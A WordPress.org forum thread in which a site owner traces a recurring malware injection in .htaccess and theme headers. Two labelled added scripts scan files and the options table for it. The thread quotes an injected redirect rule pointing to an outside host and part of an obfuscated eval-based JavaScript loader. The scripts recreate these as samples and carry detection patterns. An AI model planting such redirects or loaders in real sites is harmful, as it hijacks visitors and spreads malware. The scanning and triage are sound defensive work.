WordPress.org


Malware in DB - how to identify (18 posts)

  1. ThorHammer
    Member
    Posted 1 year ago #

    After cleaning my site entirely and changing the db-user and its password to 50 random chars, as well as the ONLY account, admin, to another 50 random chars, deleting the entire old installation and all plugins and the theme as well, and of course new salt-code, and then reinstalling everything fresh AND adding very, very strict .htaccess files in ALL folders and root - the fu***ng malware code again appeared in my root .htaccess and in the theme's header code. This must mean that something must be stored somewhere in my DB, of course encoded, but how on earth am I supposed to find this shit and kill it once and for all??
    I am willing to crawl into every single row in order to get rid of this pest, but I really do not know what I am looking for.
    Any ideas?

  2. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    The back door might not be in the database but hidden in your uploads folder. See http://ottopress.com/2009/hacked-wordpress-backdoors/

  3. ThorHammer
    Member
    Posted 1 year ago #

    Thanks for your reply. Sadly, my upload dir is clean as water. All years. Each month... I have checked everything. It has to be something in the database.

  4. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Have you spoken to your hosts? This could be a server security issue - not a WP one - especially since the root .htaccess was targeted.

  5. ThorHammer
    Member
    Posted 1 year ago #

    Yes, I have spoken to them, but they are not willing to take any responsibility.
    By the way, the code inserted into my .htaccess and my theme's header is easy to find; it always starts with #336988#, with the code in between, and ends with a trailing slash.
    In .htaccess this entry is cleared: RewriteRule ^(.*)$ http://digitalphoto-art.it/traf.php [R=301,L]

    The malware code in the header template is a PHP echoing a JavaScript which starts like this: dbshre=220;try{window.document.body*=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement(\"div\");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(31,94,11 etc etc.
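    An added example, not code from the thread: a scanner for the two injection points post 5 describes and the uploads-folder back doors post 2 points to. It walks a WordPress tree and reports files containing the #336988# delimiter, the try/catch plus e=eval JavaScript loader, any .htaccess RewriteRule that 301/302-redirects to a host other than the site's own, and PHP files under wp-content/uploads. The sample install it builds in a temporary directory is constructed for the demo; the closing "#/336988#" line, the theme path and the example.com hosts are assumptions (the thread only says the block ends with a trailing slash).

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Signatures. The "#336988#" delimiter, the try/catch + e=eval loader and the
# catch-all RewriteRule are quoted from post 5; the uploads rule is post 2's
# point that a dropped PHP file under wp-content/uploads is a classic back door.
MARKER_RE = re.compile(r"#336988#")
JS_LOADER_RE = re.compile(r"try\{window\.document\.body\*=2\}catch\(|\be=eval;")
REDIRECT_RE = re.compile(
    r"^\s*RewriteRule\s+\S+\s+(https?://\S+)\s+\[[^\]]*R=30[12][^\]]*\]",
    re.MULTILINE | re.IGNORECASE,
)
PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}


def scan_text(relpath, text, site_hosts=frozenset()):
    """Return the findings for one file.

    relpath: path relative to the WordPress root with '/' separators.
    site_hosts: hosts the site legitimately redirects to, so that a
    www canonicalisation rule is not reported as an injected redirect.
    """
    hits = []
    if MARKER_RE.search(text):
        hits.append("marker_336988")
    if JS_LOADER_RE.search(text):
        hits.append("js_eval_loader")
    if relpath.endswith(".htaccess"):
        for m in REDIRECT_RE.finditer(text):
            host = urlsplit(m.group(1)).hostname
            if host not in site_hosts:
                hits.append("htaccess_external_redirect:%s" % host)
    if relpath.startswith("wp-content/uploads/") and Path(relpath).suffix.lower() in PHP_EXTS:
        hits.append("php_in_uploads")
    return hits


def scan_tree(root, site_hosts=frozenset()):
    """Walk an install and return {relative path: findings} for files with findings."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            hits = scan_text(rel, path.read_text(encoding="utf-8", errors="replace"), site_hosts)
            if hits:
                report[rel] = hits
    return report


# Constructed sample install (assumption, not the poster's files): a clean
# index.php, the two injections from post 5 with an assumed "#/336988#" closing
# line, a legitimate www redirect that must not be flagged, a harmless upload
# and a PHP file dropped into the uploads tree.
SAMPLE_FILES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    ".htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_HOST} ^example\\.com$\n"
        "RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]\n"
        "#336988#\n"
        "RewriteRule ^(.*)$ http://digitalphoto-art.it/traf.php [R=301,L]\n"
        "#/336988#\n"
    ),
    "wp-content/themes/mytheme/header.php": (
        "<!DOCTYPE html>\n<html>\n<head>\n"
        "#336988#\n"
        "<?php echo '<script>dbshre=220;try{window.document.body*=2}catch(gdsgsdg)"
        "{if(dbshre){zaq=0;try{v=document.createElement(\"div\");}catch(agdsg){zaq=1;}"
        "if(!zaq){e=eval;}}}</script>'; ?>\n"
        "#/336988#\n"
        "<?php wp_head(); ?>\n</head>\n"
    ),
    "wp-content/uploads/2012/05/photo.jpg": "stand-in for image bytes\n",
    "wp-content/uploads/2012/05/thumb.php": "<?php /* stand-in for a dropped back door */ ?>\n",
}


def build_sample_site(root):
    root = Path(root)
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def demo():
    """Build the sample install in a temp dir and scan it; returns the report."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_tree(tmp, site_hosts=frozenset({"example.com", "www.example.com"}))


if __name__ == "__main__":
    for rel, hits in demo().items():
        print("%s -> %s" % (rel, ", ".join(hits)))
```

    Against a real install, call scan_tree('/path/to/wordpress', site_hosts={'your.host'}). A php_in_uploads hit or a redirect to a host you do not own is worth acting on directly; the marker and loader signatures are specific to this one campaign and will miss a re-obfuscated variant, so a clean result means only that these particular strings are absent.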

  6. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    I have spoken to them, but they are not willing to take any responsibility.

    Time to change hosts, perhaps? Have you changed all of your ftp and hosting account management passwords in case you had an ftp leak?

    From what you describe above, I can't see how anything in the database could be responsible for this. It really does smack of a compromised server, but just to be on the safe side, do you have any pre-hack database backups?

  7. ThorHammer
    Member
    Posted 1 year ago #

    Yes, I do have an old DB backup, but of course it is missing some entries. And yes, I have changed all passwords - everything.

  8. ThorHammer
    Member
    Posted 1 year ago #

    After googling myself to death I have found something that might be a very, very odd row in my OPTIONS table:

    SELECT *
    FROM `my_damn_database`.`my_damn_database_options`
    WHERE (
        CONVERT(`option_id` USING utf8) LIKE 'ftp_credentials'
        OR CONVERT(`option_name` USING utf8) LIKE 'ftp_credentials'
        OR CONVERT(`option_value` USING utf8) LIKE 'ftp_credentials'
        OR CONVERT(`autoload` USING utf8) LIKE 'ftp_credentials'
    )
    LIMIT 0, 30

    Should I delete this row? Now?

  9. ThorHammer
    Member
    Posted 1 year ago #

    The information WordPress needs in order to update plugins, themes and core is stored in wp-config. The information I found in my DB (Options table) (the row with ftp_credentials) is actually the complete information needed to get full FTP access to my server...! This cannot be a standard WordPress insert?

  10. This cannot be a standard wordpress insert?

    I've never looked myself, as FTP is a horrible protocol for me, but if you can set up a second instance of WordPress with a separate table prefix (so you don't use the old installation) you can easily check.

  11. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Can I just clarify that this was an option called ftp_credentials in the wp_option table? Just checked a couple of my sites & there's nothing like this in the databases.

  12. ThorHammer
    Member
    Posted 1 year ago #

    Yes, Esmi. In the OPTIONS table I have a row with option_name: ftp_credentials

    The value is (almost - but it is straightforwardly the real FTP address and the real FTP login name, and yes, it is marked autoload YES):
    a:3:{s:8:"hostname";s:14:"webnumber51.theserver.com";s:8:"username";s:5:"the-real-username";s:15:"connection_type";s:3:"ftp";}
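    An added example, not code from the thread or from WordPress: a triage pass over wp_options rows of the kind post 8 was hunting with phpMyAdmin's search and post 12 quotes. It decodes PHP serialize() values (the format the ftp_credentials row is stored in), reports which keys such a row carries and whether a password is among them, and flags values that look like payloads: the #336988# marker from post 5, <script> tags, eval and base64_decode calls, long base64 blobs, and serialized strings whose byte lengths no longer match their content (the value exactly as quoted in post 12 fails that check because the redaction changed the string lengths). One fact worth having beside post 17: WordPress core's request_filesystem_credentials() in wp-admin/includes/file.php saves hostname, username and connection_type under the option name ftp_credentials once FTP details have been entered on an update screen, and deliberately does not save the password, so the option's presence is not by itself evidence of a hack, whereas a password key inside it would be. The sample rows, the option names other than ftp_credentials and the wp_ prefix in DUMP_QUERY are constructed assumptions.

```python
import re

# Query to pull the rows this script triages (assumes the default "wp_" prefix;
# substitute your own). Autoloaded rows are read on every request, which is
# why injected payloads are normally stored with autoload = 'yes'.
DUMP_QUERY = (
    "SELECT option_name, option_value, autoload FROM wp_options "
    "WHERE autoload = 'yes' ORDER BY LENGTH(option_value) DESC;"
)

SUSPICIOUS_PATTERNS = {
    "marker_336988": re.compile(r"#336988#"),            # delimiter quoted in post 5
    "script_tag": re.compile(r"<script\b", re.IGNORECASE),
    "eval_call": re.compile(r"\beval\s*\("),
    "eval_alias": re.compile(r"\be=eval;"),               # from the JS loader in post 5
    "base64_decode_call": re.compile(r"\bbase64_decode\s*\("),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}


class PhpUnserializeError(ValueError):
    pass


def php_unserialize(text):
    """Decode PHP serialize() output (N, b, i, d, s, a). Objects (O:) are rejected:
    a serialized object in wp_options is itself worth a look (PHP object injection)."""
    data = text.encode("utf-8")          # PHP string lengths are byte counts
    value, end = _parse(data, 0)
    if end != len(data):
        raise PhpUnserializeError("trailing data after serialized value")
    return value


def _parse(b, i):
    tag = b[i:i + 1]
    if tag == b"N" and b[i:i + 2] == b"N;":
        return None, i + 2
    if tag in (b"b", b"i", b"d"):
        end = b.index(b";", i)
        raw = b[i + 2:end].decode()
        if tag == b"b":
            return raw == "1", end + 1
        return (int(raw) if tag == b"i" else float(raw)), end + 1
    if tag in (b"s", b"a"):
        colon = b.index(b":", i + 2)
        n = int(b[i + 2:colon])
        if tag == b"s":
            start = colon + 2                # skip :"
            if b[start + n:start + n + 2] != b'";':
                raise PhpUnserializeError("string length does not match content")
            return b[start:start + n].decode("utf-8", "replace"), start + n + 2
        j, out = colon + 2, {}               # skip :{
        for _ in range(n):
            k, j = _parse(b, j)
            out[k], j = _parse(b, j)
        if b[j:j + 1] != b"}":
            raise PhpUnserializeError("array not closed")
        return out, j + 1
    raise PhpUnserializeError("unsupported or corrupt tag %r at offset %d" % (tag, i))


def looks_serialized(value):
    return value == "N;" or value[:2] in ("a:", "s:", "i:", "d:", "b:", "O:")


def triage_option(name, value):
    """Return the list of findings for one wp_options row (empty means nothing noticed)."""
    flags = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(value)]
    parsed = None
    if looks_serialized(value):
        try:
            parsed = php_unserialize(value)
        except ValueError:               # PhpUnserializeError, bad int(), missing ';' ...
            flags.append("unparsable_serialized")
    if name == "ftp_credentials":
        keys = sorted(str(k) for k in parsed) if isinstance(parsed, dict) else []
        flags.append("ftp_credentials_keys=" + ",".join(keys))
        if "password" in keys:
            flags.append("ftp_credentials_has_password")
    return flags


def triage_table(rows):
    """rows: (option_name, option_value, autoload) -> {name: (autoload, flags)} for flagged rows."""
    report = {}
    for name, value, autoload in rows:
        flags = triage_option(name, value)
        if flags:
            report[name] = (autoload, flags)
    return report


# Constructed sample rows (not a real dump). The ftp_credentials value has the
# same three keys as the one quoted in post 12, with byte lengths that match.
SAMPLE_ROWS = [
    ("siteurl", "http://example.test", "yes"),
    ("ftp_credentials",
     'a:3:{s:8:"hostname";s:16:"ftp.example.test";s:8:"username";s:7:"wpadmin";'
     's:15:"connection_type";s:3:"ftp";}', "yes"),
    ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:24:"<script>e=eval;</script>";}}', "yes"),
    ("wp_cache_tmp", 'eval(base64_decode("' + "QUFB" * 60 + '"));', "yes"),
]
# The value exactly as quoted (redacted) in post 12; the redaction broke the lengths.
QUOTED_FTP_VALUE = ('a:3:{s:8:"hostname";s:14:"webnumber51.theserver.com";s:8:"username";'
                    's:5:"the-real-username";s:15:"connection_type";s:3:"ftp";}')


def demo():
    return triage_table(SAMPLE_ROWS)


if __name__ == "__main__":
    for name, (autoload, flags) in demo().items():
        print("%s (autoload=%s): %s" % (name, autoload, ", ".join(flags)))
```

    Feed it the output of DUMP_QUERY (the autoload = 'yes' filter is the important part; drop it for a second, slower pass over everything) and read the flagged rows by hand before deleting anything: widget and theme-mod options legitimately hold HTML, so script_tag alone is a prompt to look, not a verdict, while eval_call, base64_decode_call and the #336988# marker in an option value are not things WordPress or a sane plugin writes there.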

  13. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    I wonder if this came from a plugin? It's definitely not in any of the databases that I've looked at.

    [EDIT: I've asked for some more eyes on this.]

  14. ThorHammer
    Member
    Posted 1 year ago #

    Yes...because, it might be easy just to query the db and get this very, very important information...

  15. Jose Conti
    Member
    Posted 1 year ago #

    Do you use filezilla client?

    That FTP client stores all data without encryption, so if you have a Trojan on your PC, someone can access all your usernames, passwords and websites.

  16. ThorHammer
    Member
    Posted 1 year ago #

    No, José, I am using another FTP client, and yes, I have recently found a trojan on my PC and killed it. I have not checked if this client stores the login information un-encrypted as Filezilla does (as a very visible text file).
    But still: the table row I found in my options really does look suspicious.

  17. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Right now, we think this is part of your hack rather than anything added by WordPress itself. That said, it's not possible to rule out this being added by a poorly-designed plugin. Or even a theme (I've seen some themes that require FTP access).

  18. ThorHammer
    Member
    Posted 1 year ago #

    And I have just emptied and dropped this row. Everything works as it should.
    It will be very interesting to see if this has any effect, among all the other things I have done, to prevent further malicious code injections.

Topic Closed
